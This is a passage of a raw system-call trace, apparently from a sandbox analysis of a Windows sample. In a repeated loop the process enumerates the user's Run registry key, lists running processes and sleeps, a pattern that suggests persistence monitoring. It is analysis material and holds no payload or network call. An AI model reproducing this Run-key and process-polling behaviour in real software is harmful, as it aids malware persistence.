KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.527] NtClose (Handle=0xec) returned 0x0 [0188.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.532] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.542] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.542] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.542] NtClose (Handle=0xec) returned 0x0 [0188.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.545] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.557] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.558] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.558] NtClose (Handle=0xec) returned 0x0 [0188.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.561] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.573] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.573] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.573] NtClose (Handle=0xec) returned 0x0 [0188.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.577] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.589] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.589] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.589] NtClose (Handle=0xec) returned 0x0 [0188.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.593] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.604] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.605] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.605] NtClose (Handle=0xec) returned 0x0 [0188.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.609] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.620] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.620] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.620] NtClose (Handle=0xec) returned 0x0 [0188.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.624] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.636] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.636] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.637] NtClose (Handle=0xec) returned 0x0 [0188.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.641] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.657] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.657] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.657] NtClose (Handle=0xec) returned 0x0 [0188.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.661] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.667] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.667] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.667] NtClose (Handle=0xec) returned 0x0 [0188.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.671] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.682] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.682] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.682] NtClose (Handle=0xec) returned 0x0 [0188.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.686] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.698] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.698] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.698] NtClose (Handle=0xec) returned 0x0 [0188.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.702] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.713] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.714] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.714] NtClose (Handle=0xec) returned 0x0 [0188.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.718] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.729] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.729] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.729] NtClose (Handle=0xec) returned 0x0 [0188.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, 